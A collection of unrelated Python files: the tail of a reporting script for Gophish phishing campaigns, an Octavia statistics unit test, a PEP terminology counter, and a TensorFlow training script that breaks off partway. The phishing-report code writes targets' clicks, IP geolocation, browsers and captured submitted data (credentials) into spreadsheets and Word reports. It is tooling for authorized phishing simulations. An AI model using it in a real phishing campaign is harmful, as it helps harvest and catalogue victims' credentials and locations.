worksheet.write(row, col+4, os_details, wrap_format)
self.operating_systems.append(os_details)
row += 1
if event.message == "Submitted Data" and event.email == target.email:
# Now we have events for submitted data. A few notes on this:
# 1. There is no expectation of a Submit event without a Clicked Link event
# 2. Assuming that, the following process does NOT flag IP mismatches
# or add to the list of seen locations, OSs, IPs, or browsers.
worksheet.write(row, col, "Submitted Data Captured", bold_format)
row += 1
header_col = 0
headers = ["Time", "IP", "Location", "Browser", "Operating System", "Data Captured"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
temp = event.time.split('T')
worksheet.write(row, col, "{} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
worksheet.write(row, col+1, "{}".format(event.details['browser']['address']), wrap_format)
loc = self.geolocate(target, event.details['browser']['address'], self.google)
worksheet.write(row, col+2, loc, wrap_format)
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
worksheet.write(row, col+3, browser_details, wrap_format)
os_details = user_agent.os.family + " " + user_agent.os.version_string
worksheet.write(row, col+4, os_details, wrap_format)
# Get just the submitted data from the event's payload
submitted_data = ""
data_payload = event.details['payload']
# Get all of the submitted data
for key, value in data_payload.items():
# To get just submitted data, we drop the 'rid' key
if not key == "rid":
submitted_data += "{}:{}".format(key, str(value).strip("[").strip("]"))
worksheet.write(row, col+1, submitted_data, wrap_format)
row += 1
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
else:
# This target had no clicked or submitted events so move on to next
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
continue
worksheet.write(row, col, "")
row += 1
print("[+] Finished writing detailed analysis...")
worksheet = goreport_xlsx.add_worksheet("Stats")
row = 0
col = 0
worksheet.set_column(0, 10, 35)
worksheet.write(row, col, "Recorded Browsers Based on User-Agents:", bold_format)
row += 1
header_col = 0
headers = ["Browser", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_browsers = Counter(self.browsers)
for key, value in counted_browsers.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row +=1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Record OS From Browser User-Agents:", bold_format)
row += 1
header_col = 0
headers = ["Operating System", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_os = Counter(self.operating_systems)
for key, value in counted_os.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row +=1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Recorded Locations from IPs:", bold_format)
row += 1
header_col = 0
headers = ["Locations", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_locations = Counter(self.locations)
for key, value in counted_locations.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Recorded IPs:", bold_format)
row += 1
header_col = 0
headers = ["IP Address", "Seen"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
counted_ip_addresses = Counter(self.ip_addresses)
for key, value in counted_ip_addresses.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write_number(row, col+1, value, num_format)
row += 1
worksheet.write(row, col, "Recorded IPs and Locations:", bold_format)
row += 1
header_col = 0
headers = ["IP Address", "Location"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
for key, value in self.ip_and_location.items():
worksheet.write(row, col, "{}".format(key), wrap_format)
worksheet.write(row, col+1, "{}".format(value), wrap_format)
row += 1
goreport_xlsx.close()
print("[+] Done! Check \'{}\' for your results.".format(self.output_xlsx_report))
def write_word_report(self):
"""Assemble and output the Word docx file report."""
# Create document writer using the template and a style editor
d = Document("template.docx")
styles = d.styles
# Create a custom styles for table cells
style = styles.add_style("Cell Text", WD_STYLE_TYPE.CHARACTER)
cell_text = d.styles["Cell Text"]
cell_text_font = cell_text.font
cell_text_font.name = "Calibri"
cell_text_font.size = Pt(12)
cell_text_font.bold = True
cell_text_font.color.rgb = RGBColor(0xFF, 0xFF, 0xFF)
style = styles.add_style("Cell Text Hit", WD_STYLE_TYPE.CHARACTER)
cell_text_hit = d.styles["Cell Text Hit"]
cell_text_hit_font = cell_text_hit.font
cell_text_hit_font.name = "Calibri"
cell_text_hit_font.size = Pt(12)
cell_text_hit_font.bold = True
cell_text_hit_font.color.rgb = RGBColor(0x00, 0x96, 0x00)
style = styles.add_style("Cell Text Miss", WD_STYLE_TYPE.CHARACTER)
cell_text_miss = d.styles["Cell Text Miss"]
cell_text_miss_font = cell_text_miss.font
cell_text_miss_font.name = "Calibri"
cell_text_miss_font.size = Pt(12)
cell_text_miss_font.bold = True
cell_text_miss_font.color.rgb = RGBColor(0xFF, 0x00, 0x00)
# Write a campaign summary at the top of the report
d.add_heading("Executive Summary", 1)
p = d.add_paragraph()
run = p.add_run("Campaign Results For: {}".format(self.cam_name))
run.bold = True
# Runs are basically "runs" of text and must be aligned like we want
# them aligned in the report -- thus they are pushed left
if self.cam_status == "Completed":
completed_status = "Completed:\t{} on {}".format(self.completed_date.split("T")[1].split(".")[0],
self.completed_date.split("T")[0])
else:
completed_status = "Still Active"
p.add_run("""
Status: {}
Created: {} on {}
Started: {} on {}
Completed: {}
""".format(self.cam_status, self.created_date.split("T")[1].split(".")[0], self.created_date.split("T")[0],
self.launch_date.split("T")[1].split(".")[0], self.launch_date.split("T")[0], completed_status))
if self.cam_status == "Completed":
print()
# Write the campaign details -- email details and template settings
run = p.add_run("Campaign Details")
run.bold = True
p.add_run("""
From: {}
Subject: {}
Phish URL: {}
Redirect URL: {}
Attachment(s): {}
Captured Credentials: {}
Stored Passwords: {}
""".format(self.cam_from_address, self.cam_subject_line, self.cam_url,
self.cam_redirect_url, self.cam_template_attachments, self.cam_capturing_credentials,
self.cam_capturing_passwords))
# Write a high level summary for stats
run = p.add_run("High Level Results")
run.bold = True
p.add_run("""
Total Targets: {}
The following totals indicate how many events of each type Gophish recorded:
Total Open Events: {}
Total Click Events: {}
Total Report Events: {}
Total Submitted Data Events: {}
The following totals indicate how many targets participated in each event type:
Individuals Who Opened: {}
Individuals Who Clicked: {}
Individuals Who Reported: {}
Individuals Who Submitted: {}
""".format(self.total_targets, self.total_opened, self.total_clicked, self.total_reported,
self.total_submitted, self.total_unique_opened, self.total_unique_clicked,
self.total_unique_reported, self.total_unique_submitted))
d.add_page_break()
print("[+] Finished writing high level summary...")
# End of the campaign summary and beginning of the event summary
d.add_heading("Summary of Events", 1)
d.add_paragraph("The following table summarizes who opened and clicked on emails sent in this campaign.")
# Create a table to hold the event summary results
table = d.add_table(rows=len(self.campaign_results_summary) + 1, cols=7, style="GoReport")
header0 = table.cell(0, 0)
header0.text = ""
header0.paragraphs[0].add_run("Email Address", "Cell Text").bold = True
header1 = table.cell(0, 1)
header1.text = ""
header1.paragraphs[0].add_run("Open", "Cell Text").bold = True
header2 = table.cell(0, 2)
header2.text = ""
header2.paragraphs[0].add_run("Click", "Cell Text").bold = True
header3 = table.cell(0, 3)
header3.text = ""
header3.paragraphs[0].add_run("Data", "Cell Text").bold = True
header4 = table.cell(0, 4)
header4.text = ""
header4.paragraphs[0].add_run("Report", "Cell Text").bold = True
header5 = table.cell(0, 5)
header5.text = ""
header5.paragraphs[0].add_run("OS", "Cell Text").bold = True
header6 = table.cell(0, 6)
header6.text = ""
header6.paragraphs[0].add_run("Browser", "Cell Text").bold = True
# Sort campaign summary by each dict's email entry and then create results table
target_counter = 0
counter = 1
ordered_results = sorted(self.campaign_results_summary, key=lambda k: k['email'])
for target in ordered_results:
email_cell = table.cell(counter, 0)
email_cell.text = "{}".format(target['email'])
temp_cell = table.cell(counter, 1)
if target['opened']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 2)
if target['clicked']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 3)
if target['submitted']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
temp_cell = table.cell(counter, 4)
if target['reported']:
temp_cell.paragraphs[0].add_run(u'\u2713', "Cell Text Hit")
else:
temp_cell.paragraphs[0].add_run(u'\u2718', "Cell Text Miss")
if target['email'] in self.targets_clicked:
for event in self.timeline:
if event.message == "Clicked Link" and event.email == target['email']:
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
os_details = user_agent.os.family + " " + \
user_agent.os.version_string
temp_cell = table.cell(counter, 5)
temp_cell.text = os_details
temp_cell = table.cell(counter, 6)
temp_cell.text = browser_details
else:
temp_cell = table.cell(counter, 5)
temp_cell.text = "N/A"
temp_cell = table.cell(counter, 6)
temp_cell.text = "N/A"
counter += 1
target_counter += 1
print("[+] Created table entry for {} of {}.".format(
target_counter, self.total_targets))
d.add_page_break()
# End of the event summary and beginning of the detailed results
print("[+] Finished writing events summary...")
print("[+] Detailed results analysis is next and may take some time if you had a lot of targets...")
d.add_heading("Detailed Findings", 1)
target_counter = 0
for target in self.results:
# Only create a Detailed Analysis section for targets with clicks
if target.email in self.targets_clicked:
# Create counters to track table cell locations
opened_counter = 1
clicked_counter = 1
submitted_counter = 1
# Create section starting with a header with the first and last name
d.add_heading("{} {}".format(target.first_name, target.last_name), 2)
p = d.add_paragraph(target.email)
p = d.add_paragraph()
# Save a spot to record the email sent date and time in the report
email_sent_run = p.add_run()
# Go through all events to find events for this target
for event in self.timeline:
if event.message == "Email Sent" and event.email == target.email:
# Parse the timestamp into separate date and time variables
# Ex: 2017-01-30T14:31:22.534880731-05:00
temp = event.time.split('T')
sent_date = temp[0]
sent_time = temp[1].split('.')[0]
# Record the email sent date and time in the run created earlier
email_sent_run.text = "Email sent on {} at {}".format(sent_date, sent_time)
if event.message == "Email Opened" and event.email == target.email:
if opened_counter == 1:
# Create the Email Opened/Previewed table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Email Previews")
run.bold = True
opened_table = d.add_table(rows=1, cols=1, style="GoReport")
opened_table.autofit = True
opened_table.allow_autofit = True
header1 = opened_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
# Begin by adding a row to the table and inserting timestamp
opened_table.add_row()
timestamp = opened_table.cell(opened_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
opened_counter += 1
if event.message == "Clicked Link" and event.email == target.email:
if clicked_counter == 1:
# Create the Clicked Link table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Email Link Clicked")
run.bold = True
clicked_table = d.add_table(rows=1, cols=5, style="GoReport")
clicked_table.autofit = True
clicked_table.allow_autofit = True
header1 = clicked_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
header2 = clicked_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("IP", "Cell Text").bold = True
header3 = clicked_table.cell(0, 2)
header3.text = ""
header3.paragraphs[0].add_run("Location", "Cell Text").bold = True
header4 = clicked_table.cell(0, 3)
header4.text = ""
header4.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header5 = clicked_table.cell(0, 4)
header5.text = ""
header5.paragraphs[0].add_run("Operating System",
"Cell Text").bold = True
clicked_table.add_row()
timestamp = clicked_table.cell(clicked_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
ip_add = clicked_table.cell(clicked_counter, 1)
# Check if browser IP matches the target's IP and record result
ip_add.text = self.compare_ip_addresses(
target.ip, event.details['browser']['address'], self.verbose)
# Parse the location data
event_location = clicked_table.cell(clicked_counter, 2)
event_location.text = self.geolocate(target, event.details['browser']['address'], self.google)
# Parse the user-agent string for browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
browser = clicked_table.cell(clicked_counter, 3)
browser.text = browser_details
self.browsers.append(browser_details)
op_sys = clicked_table.cell(clicked_counter, 4)
os_details = user_agent.os.family + " " + user_agent.os.version_string
op_sys.text = os_details
self.operating_systems.append(os_details)
clicked_counter += 1
if event.message == "Submitted Data" and event.email == target.email:
if submitted_counter == 1:
# Create the Submitted Data table
p = d.add_paragraph()
p.style = d.styles['Normal']
run = p.add_run("Data Captured")
run.bold = True
submitted_table = d.add_table(rows=1, cols=6, style="GoReport")
submitted_table.autofit = True
submitted_table.allow_autofit = True
header1 = submitted_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Time", "Cell Text").bold = True
header2 = submitted_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("IP", "Cell Text").bold = True
header3 = submitted_table.cell(0, 2)
header3.text = ""
header3.paragraphs[0].add_run("Location", "Cell Text").bold = True
header4 = submitted_table.cell(0, 3)
header4.text = ""
header4.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header5 = submitted_table.cell(0, 4)
header5.text = ""
header5.paragraphs[0].add_run("Operating System",
"Cell Text").bold = True
header6 = submitted_table.cell(0, 5)
header6.text = ""
header6.paragraphs[0].add_run("Data Captured",
"Cell Text").bold = True
submitted_table.add_row()
timestamp = submitted_table.cell(submitted_counter, 0)
temp = event.time.split('T')
timestamp.text = temp[0] + " " + temp[1].split('.')[0]
ip_add = submitted_table.cell(submitted_counter, 1)
ip_add.text = event.details['browser']['address']
# Parse the location data
event_location = submitted_table.cell(submitted_counter, 2)
event_location.text = self.geolocate(target, event.details['browser']['address'], self.google)
# Parse the user-agent string and add browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
browser = submitted_table.cell(submitted_counter, 3)
browser.text = browser_details
op_sys = submitted_table.cell(submitted_counter, 4)
os_details = user_agent.os.family + " " + user_agent.os.version_string
op_sys.text = "{}".format(os_details)
# Get just the submitted data from the event's payload
submitted_data = ""
data = submitted_table.cell(submitted_counter, 5)
data_payload = event.details['payload']
# Get all of the submitted data
for key, value in data_payload.items():
# To get just submitted data, we drop the 'rid' key
if not key == "rid":
submitted_data += "{}:{} ".format(
key, str(value).strip("[").strip("]"))
data.text = "{}".format(submitted_data)
submitted_counter += 1
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(
target_counter, self.total_targets))
d.add_page_break()
else:
# This target had no clicked or submitted events so move on to next
target_counter += 1
print("[+] Processed detailed analysis for {} of {}.".format(target_counter, self.total_targets))
continue
print("[+] Finished writing Detailed Analysis section...")
# End of the detailed results and the beginning of browser, location, and OS stats
d.add_heading("Statistics", 1)
p = d.add_paragraph("The following table shows the browsers seen:")
# Create browser table
browser_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(browser_table.columns[0], Cm(7.24))
self._set_word_column_width(browser_table.columns[1], Cm(3.35))
header1 = browser_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Browser", "Cell Text").bold = True
header2 = browser_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the operating systems seen:")
# Create OS table
os_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(os_table.columns[0], Cm(7.24))
self._set_word_column_width(os_table.columns[1], Cm(3.35))
header1 = os_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Operating System", "Cell Text").bold = True
header2 = os_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the locations seen:")
# Create geo IP table
location_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(location_table.columns[0], Cm(7.24))
self._set_word_column_width(location_table.columns[1], Cm(3.35))
header1 = location_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("Location", "Cell Text").bold = True
header2 = location_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Visits", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the IP addresses captured:")
# Create IP address table
ip_add_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(ip_add_table.columns[0], Cm(7.24))
self._set_word_column_width(ip_add_table.columns[1], Cm(3.35))
header1 = ip_add_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("IP Address", "Cell Text").bold = True
header2 = ip_add_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Seen", "Cell Text").bold = True
p = d.add_paragraph("\nThe following table shows the IP addresses matched with geolocation data:")
# Create IP address and location table
ip_loc_table = d.add_table(rows=1, cols=2, style="GoReport")
self._set_word_column_width(ip_loc_table.columns[0], Cm(7.24))
self._set_word_column_width(ip_loc_table.columns[1], Cm(3.35))
header1 = ip_loc_table.cell(0, 0)
header1.text = ""
header1.paragraphs[0].add_run("IP Address", "Cell Text").bold = True
header2 = ip_loc_table.cell(0, 1)
header2.text = ""
header2.paragraphs[0].add_run("Location", "Cell Text").bold = True
# Counters are used here again to track rows
counter = 1
# Counter is used to count all elements in the lists to create a unique list with totals
counted_browsers = Counter(self.browsers)
for key, value in counted_browsers.items():
browser_table.add_row()
cell = browser_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = browser_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_os = Counter(self.operating_systems)
for key, value in counted_os.items():
os_table.add_row()
cell = os_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = os_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_locations = Counter(self.locations)
for key, value in counted_locations.items():
location_table.add_row()
cell = location_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = location_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
counted_ip_addresses = Counter(self.ip_addresses)
for key, value in counted_ip_addresses.items():
ip_add_table.add_row()
cell = ip_add_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = ip_add_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
counter = 1
for key, value in self.ip_and_location.items():
ip_loc_table.add_row()
cell = ip_loc_table.cell(counter, 0)
cell.text = "{}".format(key)
cell = ip_loc_table.cell(counter, 1)
cell.text = "{}".format(value)
counter += 1
# Finalize document and save it as the value of output_word_report
d.save("{}".format(self.output_word_report))
print("[+] Done! Check \"{}\" for your results.".format(self.output_word_report))
def config_section_map(self, config_parser, section):
"""This function helps by reading accepting a config file section, from gophish.config,
and returning a dictionary object that can be referenced for configuration settings.
"""
section_dict = {}
options = config_parser.options(section)
for option in options:
try:
section_dict[option] = config_parser.get(section, option)
if section_dict[option] == -1:
print("[-] Skipping: {}".format(option))
except:
print("[!] There was an error with: {}".format(option))
section_dict[option] = None
return section_dict
|
the-stack_0_25885
|
# Copyright 2018 GoDaddy
# Copyright (c) 2015 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
from oslo_utils import uuidutils
from octavia.common import data_models
from octavia.statistics.drivers import update_db
from octavia.tests.unit import base
class TestStatsUpdateDb(base.TestCase):
def setUp(self):
super(TestStatsUpdateDb, self).setUp()
self.amphora_id = uuidutils.generate_uuid()
self.listener_id = uuidutils.generate_uuid()
@mock.patch('octavia.db.repositories.ListenerStatisticsRepository')
@mock.patch('octavia.db.api.get_session')
def test_update_stats(self, mock_get_session, mock_listener_stats_repo):
bytes_in1 = random.randrange(1000000000)
bytes_out1 = random.randrange(1000000000)
active_conns1 = random.randrange(1000000000)
total_conns1 = random.randrange(1000000000)
request_errors1 = random.randrange(1000000000)
stats_1 = data_models.ListenerStatistics(
listener_id=self.listener_id,
amphora_id=self.amphora_id,
bytes_in=bytes_in1,
bytes_out=bytes_out1,
active_connections=active_conns1,
total_connections=total_conns1,
request_errors=request_errors1
)
bytes_in2 = random.randrange(1000000000)
bytes_out2 = random.randrange(1000000000)
active_conns2 = random.randrange(1000000000)
total_conns2 = random.randrange(1000000000)
request_errors2 = random.randrange(1000000000)
stats_2 = data_models.ListenerStatistics(
listener_id=self.listener_id,
amphora_id=self.amphora_id,
bytes_in=bytes_in2,
bytes_out=bytes_out2,
active_connections=active_conns2,
total_connections=total_conns2,
request_errors=request_errors2
)
update_db.StatsUpdateDb().update_stats(
[stats_1, stats_2], deltas=False)
mock_listener_stats_repo().replace.assert_has_calls([
mock.call(mock_get_session(), stats_1),
mock.call(mock_get_session(), stats_2)
])
update_db.StatsUpdateDb().update_stats(
[stats_1, stats_2], deltas=True)
mock_listener_stats_repo().increment.assert_has_calls([
mock.call(mock_get_session(), stats_1),
mock.call(mock_get_session(), stats_2)
])
|
the-stack_0_25889
|
#!/usr/bin/env python3
"""Count the frequency of various phrases, given the path to the Python PEPs.
In Python PEPs, the opposite of “subclass” is almost always “base class” — just remember that the builtin is named super(), not base()! Stats:
216 base class
0 child class
10 derived class
12 parent class
372 subclass
10 super class
44 superclass
"""
import argparse
import os
import re
import sys
TERMS = (
'superclass',
'super class',
'subclass',
'base class',
'derived class',
'parent class',
'child class',
)
def main(argv):
parser = argparse.ArgumentParser(description='PEP terminology counts')
parser.add_argument('pepsdir', help='path to PEPs repo')
try:
args = parser.parse_args(argv)
except SystemExit:
print('\nTo checkout the PEPs from version control, git clone:'
'\nhttps://github.com/python/peps.git', file=sys.stderr)
raise
peps = []
for dirpath, dirnames, filenames in os.walk(args.pepsdir):
for filename in filenames:
if filename.endswith(('.rst', '.txt')):
peps.append(os.path.join(dirpath, filename))
counts = {term: 0 for term in TERMS}
for pep in peps:
with open(pep) as f:
content = f.read()
text = ' '.join(re.findall('\w+', content.lower()))
#text = ' '.join(content.lower().replace('.'), ' ').split())
for term in TERMS:
n = text.count(' ' + term + ' ')
m = text.count(' ' + term + 'es ')
counts[term] += n + m
for term in sorted(TERMS):
print('{:5} {}'.format(counts[term], term))
if __name__ == '__main__':
main(sys.argv[1:])
|
the-stack_0_25891
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generic training script that trains a model using a given dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
sys.path.insert(0, './slim/')
from datasets import dataset_factory_fgvc
from deployment import model_deploy
from nets import nets_factory
from preprocessing import preprocessing_factory
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'master', '', 'The address of the TensorFlow master to use.')
tf.app.flags.DEFINE_string(
'train_dir', None,
'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer('num_clones', 1,
'Number of model clones to deploy. Note For '
'historical reasons loss from all clones averaged '
'out and learning rate decay happen per clone '
'epochs')
tf.app.flags.DEFINE_boolean('clone_on_cpu', False,
'Use CPUs to deploy clones.')
tf.app.flags.DEFINE_integer('worker_replicas', 1, 'Number of worker replicas.')
tf.app.flags.DEFINE_integer(
'num_ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 4,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer(
'num_preprocessing_threads', 4,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 10,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 10,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 60,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'task', 0, 'Task id of the replica running the training.')
######################
# Optimization Flags #
######################
tf.app.flags.DEFINE_float(
'weight_decay', 0.00004, 'The weight decay on the model weights.')
tf.app.flags.DEFINE_string(
'optimizer', 'momentum',
'The name of the optimizer, one of "adadelta", "adagrad", "adam",'
'"ftrl", "momentum", "sgd" or "rmsprop".')
tf.app.flags.DEFINE_float(
'adadelta_rho', 0.95,
'The decay rate for adadelta.')
tf.app.flags.DEFINE_float(
'adagrad_initial_accumulator_value', 0.1,
'Starting value for the AdaGrad accumulators.')
tf.app.flags.DEFINE_float(
'adam_beta1', 0.9,
'The exponential decay rate for the 1st moment estimates.')
tf.app.flags.DEFINE_float(
'adam_beta2', 0.999,
'The exponential decay rate for the 2nd moment estimates.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
tf.app.flags.DEFINE_float('ftrl_learning_rate_power', -0.5,
'The learning rate power.')
tf.app.flags.DEFINE_float(
'ftrl_initial_accumulator_value', 0.1,
'Starting value for the FTRL accumulators.')
tf.app.flags.DEFINE_float(
'ftrl_l1', 0.0, 'The FTRL l1 regularization strength.')
tf.app.flags.DEFINE_float(
'ftrl_l2', 0.0, 'The FTRL l2 regularization strength.')
tf.app.flags.DEFINE_float(
'momentum', 0.9,
'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
tf.app.flags.DEFINE_integer(
'quantize_delay', -1,
'Number of steps to start quantized training. Set to -1 would disable '
'quantized training.')
#######################
# Learning Rate Flags #
#######################
tf.app.flags.DEFINE_string(
'learning_rate_decay_type',
'exponential',
'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
' or "polynomial"')
tf.app.flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'end_learning_rate', 0.0001,
'The minimal end learning rate used by a polynomial decay learning rate.')
tf.app.flags.DEFINE_float(
'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.1, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 30.0,
'Number of epochs after which learning rate decays. Note: this flag counts '
'epochs per clone but aggregates per sync replicas. So 1.0 means that '
'each clone will go over full epoch individually, but replicas will go '
'once across all replicas.')
tf.app.flags.DEFINE_bool(
'sync_replicas', True,
'Whether or not to synchronize the replicas during training.')
tf.app.flags.DEFINE_integer(
'replicas_to_aggregate', 1,
'The Number of gradients to collect before updating params.')
tf.app.flags.DEFINE_float(
'moving_average_decay', None,
'The decay to use for the moving average.'
'If left as None, then moving averages are not used.')
#######################
# Dataset Flags #
#######################
tf.app.flags.DEFINE_string(
'dataset_name', 'cub_200', 'The name of the dataset to load.')
tf.app.flags.DEFINE_string(
'dataset_split_name', 'train', 'The name of the train/validation split.')
tf.app.flags.DEFINE_string(
'dataset_dir', './data/',
'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to train.')
tf.app.flags.DEFINE_string(
'preprocessing_name', None, 'The name of the preprocessing to use. If left '
'as `None`, then the model_name flag is used.')
tf.app.flags.DEFINE_integer(
'batch_size', 64, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
'train_image_size', 299, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
'The maximum number of training steps.')
#####################
# Fine-Tuning Flags #
#####################
tf.app.flags.DEFINE_string(
'checkpoint_path', None,
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'checkpoint_exclude_scopes', None,
'Comma-separated list of scopes of variables to exclude when restoring '
'from a checkpoint.')
tf.app.flags.DEFINE_string(
'trainable_scopes', None,
'Comma-separated list of scopes to filter the set of variables to train.'
'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
'ignore_missing_vars', False,
'When restoring a checkpoint would ignore missing variables.')
FLAGS = tf.app.flags.FLAGS
def _configure_learning_rate(num_samples_per_epoch, global_step):
"""Configures the learning rate.
Args:
num_samples_per_epoch: The number of samples in each epoch of training.
global_step: The global_step tensor.
Returns:
A `Tensor` representing the learning rate.
Raises:
ValueError: if
"""
# Note: when num_clones is > 1, this will actually have each clone to go
# over each epoch FLAGS.num_epochs_per_decay times. This is different
# behavior from sync replicas and is expected to produce different results.
decay_steps = int(num_samples_per_epoch * FLAGS.num_epochs_per_decay /
FLAGS.batch_size)
if FLAGS.sync_replicas:
decay_steps /= FLAGS.replicas_to_aggregate
if FLAGS.learning_rate_decay_type == 'exponential':
return tf.train.exponential_decay(FLAGS.learning_rate,
global_step,
decay_steps,
FLAGS.learning_rate_decay_factor,
staircase=True,
name='exponential_decay_learning_rate')
elif FLAGS.learning_rate_decay_type == 'fixed':
